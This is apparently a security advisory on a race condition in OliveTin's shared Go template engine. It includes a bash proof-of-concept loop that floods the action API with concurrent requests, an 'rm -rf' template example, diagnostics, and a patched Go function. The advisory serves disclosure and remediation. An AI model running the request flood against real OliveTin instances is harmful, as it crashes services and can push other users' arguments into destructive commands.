How CVE-2026-48708 Works
OliveTin is a web interface that allows users to trigger predefined shell commands. To render dynamic command arguments, its template engine uses Go’s `text/template` package.
The root cause of this vulnerability lies in a shared, package-level `template.Template` instance, named `tpl`, defined in service/internal/tpl/templates.go. This single instance is used globally across all incoming requests.
Each time an action is executed, the `parseTemplate` function calls `tpl.Parse(source)` to compile the action’s specific template string, followed by `t.Execute()` to render it with the provided arguments. The critical flaw is that `tpl.Parse()` modifies the shared `tpl` object in place and returns the same pointer.
In OliveTin, each `ExecRequest` is handled in a new goroutine. When two or more actions are executed concurrently, a race condition occurs on this shared `tpl` instance:
1. Goroutine A calls `tpl.Parse()` for its template (e.g., "echo {{ .name }}"), setting the shared template tree to Template A.
2. Goroutine B calls `tpl.Parse()` for its template (e.g., "rm -rf {{ .path }}"), overwriting the shared template tree to Template B.
3. Goroutine A then calls `t.Execute()` with its own data. However, because the shared template tree was overwritten by Goroutine B, it executes Template B with Data A.
This unsafe pattern leads to several severe consequences:
- Cross-User Command Contamination: Arguments from one user’s request can be rendered into another user’s shell command template, leading to the execution of unintended and potentially dangerous commands.
- Go Runtime Panic: Concurrent modifications to the template's internal structures, such as its internal `tmpl` map of named templates, trigger an unrecoverable `fatal error: concurrent map writes`, crashing the entire OliveTin process.
- Incorrect Command Execution: A mismatch between the template and the data can cause commands to fail or execute with the wrong parameters.

The vulnerability is present in all versions up to and including `3000.0.0` and is classified under CWE-362 (Race Condition) and CWE-567 (Unsynchronized Access to Shared Data). The issue was addressed in version `3000.13.0`.

DailyCVE Form
Platform: OliveTin
Version: <= 3000.0.0
Vulnerability: Concurrent Template Parsing
Severity: High (7.5 CVSS)
Date: 2026-06-15
Prediction: Already Patched (3000.13.0)

What Undercode Say
Analytics:
- Root Cause Analysis: The vulnerability stems from a violation of Go's `text/template` concurrency safety rule. The documentation explicitly states that a `Template`'s `Parse` method must not be called concurrently. OliveTin's design ignored this, leading to a classic data race.
- Code Smell: The presence of a shared, mutable package-level variable (`tpl`) without any synchronization (mutex, atomic operations) is a significant code smell and a primary indicator of this vulnerability class.
- Exploitability: While exploitation requires precise timing to trigger the race condition, it is highly feasible under normal load. An attacker can simply send a high volume of concurrent requests to maximize the race window.
- Fix Verification: The recommended fix, creating a new template instance per `Parse` call, is the correct approach. It eliminates the shared state and is a standard, safe practice for concurrent template rendering.

Bash Commands & Codes:
1. Trigger Concurrent Executions (Bash)
```bash
#!/bin/bash
# Fire 50 concurrent requests to maximize the race window
for i in $(seq 1 50); do
  curl -s -X POST http://127.0.0.1:1337/api/StartAction \
    -H 'Content-Type: application/json' \
    -d '{"bindingId":"safe-echo","arguments":[{"name":"name","value":"Alice"}]}' &
  curl -s -X POST http://127.0.0.1:1337/api/StartAction \
    -H 'Content-Type: application/json' \
    -d '{"bindingId":"file-delete","arguments":[{"name":"target","value":"test"}]}' &
done
wait
echo "All requests sent"
```
2. Check for Crash
If OliveTin crashed due to concurrent map writes, the readiness endpoint no longer answers:
```bash
curl -s http://127.0.0.1:1337/readyz
```
Expected: connection refused (process crashed).

3. Check Logs for Contamination
Look for mismatched template executions in the OliveTin logs:
```bash
grep -E "missingkey|Error executing template|concurrent" /var/log/olivetin.log
```

4. Go Race Detector Verification
```bash
cd service
go run -race . &
```
Then trigger concurrent requests; the race detector will confirm the data race.

Expected output:
```text
WARNING: DATA RACE
Write by goroutine X:
  text/template.(*Template).Parse()
      service/internal/tpl/templates.go:XX
Previous read by goroutine Y:
  text/template.(*Template).Execute()
      service/internal/tpl/templates.go:XX
```
Exploit
- Prerequisites: An OliveTin instance (version <= 3000.0.0) with at least two configured actions and network accessibility.
- Attack Vector: An unauthenticated or low-privilege attacker can send a large number of concurrent API requests to trigger the race condition.
- Outcome 1: Denial of Service (DoS). The race can cause a `fatal error: concurrent map writes` in Go's runtime, crashing the entire OliveTin process and making it unavailable.
- Outcome 2: Command Contamination. An attacker's arguments can be injected into another user's command template. For example, if User A triggers a safe `echo` command and User B triggers a destructive `rm -rf` command, a race could cause User A's arguments to be executed in the context of User B's `rm -rf` command, leading to unintended data loss or system compromise.
Protection
- Immediate Action: Upgrade to OliveTin version 3000.13.0 or later, which contains the official patch for this vulnerability.
- Code-Level Fix (For Developers): The vulnerability is fixed by ensuring template parsing is thread-safe. The recommended approach is to create a new, isolated template instance for each parse call instead of reusing a shared one.
```go
import (
	"strings"
	"text/template"
)

// Recommended fix: create a new template per parse call instead of
// reusing the shared package-level instance.
func parseTemplate(source string, data any) (string, error) {
	t, err := template.New("").
		Option("missingkey=error").
		Funcs(template.FuncMap{"Json": jsonFunc}). // jsonFunc: OliveTin's existing helper
		Parse(source)
	if err != nil {
		return "", err
	}
	var sb strings.Builder
	if err := t.Execute(&sb, data); err != nil {
		return "", err
	}
	return sb.String(), nil
}
```
- Workaround (If Patching Is Not Possible): As a temporary measure, a mutex can be added around the `parseTemplate` function to serialize all template rendering. However, this will significantly harm performance and is not a recommended long-term solution.
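The following is an added example, not OliveTin's code or part of the advisory: it replays steps 1 to 3 of the race described above deterministically against a constructed shared `text/template` instance (no goroutines, so the outcome is reproducible), then runs the same interleaving with the per-call template pattern from the fix. `sharedTpl`, `ReplayShared` and `ReplayIsolated` are names invented here, and the "Alice" arguments are constructed sample data.

```go
package main

import (
	"fmt"
	"strings"
	"text/template"
)

// Constructed stand-in for OliveTin's package-level `tpl` (the real one is in
// service/internal/tpl/templates.go): one object shared by every request.
var sharedTpl = template.New("action").Option("missingkey=error")

// ReplayShared replays steps 1-3 with no goroutines: A parses, B parses over it,
// A executes with A's data. Returns pointer identity, rendered text, and the error.
func ReplayShared() (samePointer bool, out string, err error) {
	tA, err := sharedTpl.Parse("echo {{ .name }}") // step 1: goroutine A
	if err != nil {
		return false, "", err
	}
	samePointer = tA == sharedTpl // Parse mutates tpl in place and returns it
	if _, err = sharedTpl.Parse("rm -rf {{ .path }}"); err != nil { // step 2: goroutine B
		return samePointer, "", err
	}
	var sb strings.Builder
	// step 3: tA now carries template B; A's constructed arguments lack .path, so
	// missingkey=error surfaces the mismatch and out holds the partial output.
	err = tA.Execute(&sb, map[string]any{"name": "Alice"})
	return samePointer, sb.String(), err
}

// ReplayIsolated runs the same interleaving with the patched pattern, a fresh
// Template per call, so B's Parse cannot touch A's tree.
func ReplayIsolated() (string, error) {
	newTpl := func() *template.Template { return template.New("action").Option("missingkey=error") }
	tA, err := newTpl().Parse("echo {{ .name }}")
	if err != nil {
		return "", err
	}
	if _, err := newTpl().Parse("rm -rf {{ .path }}"); err != nil {
		return "", err
	}
	var sb strings.Builder
	err = tA.Execute(&sb, map[string]any{"name": "Alice"})
	return sb.String(), err
}

func main() {
	fmt.Println(ReplayShared())
	fmt.Println(ReplayIsolated())
}
```

The shared variant fails with a missing-key error for `path` (the same class of message the log grep above looks for), while the isolated variant renders `echo Alice`.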
Impact
- Confidentiality: An attacker might be able to cause a user's command arguments (which could contain sensitive data like passwords or API keys) to be rendered in another user's action output, leading to data leakage.
- Integrity: Cross-user command contamination allows an attacker to influence the execution of commands for other users, potentially causing them to perform unintended and harmful actions on the system.
- Availability: The `concurrent map writes` panic results in a complete crash of the OliveTin service, leading to a denial of service for all users.
Sources:
Reported By: github.com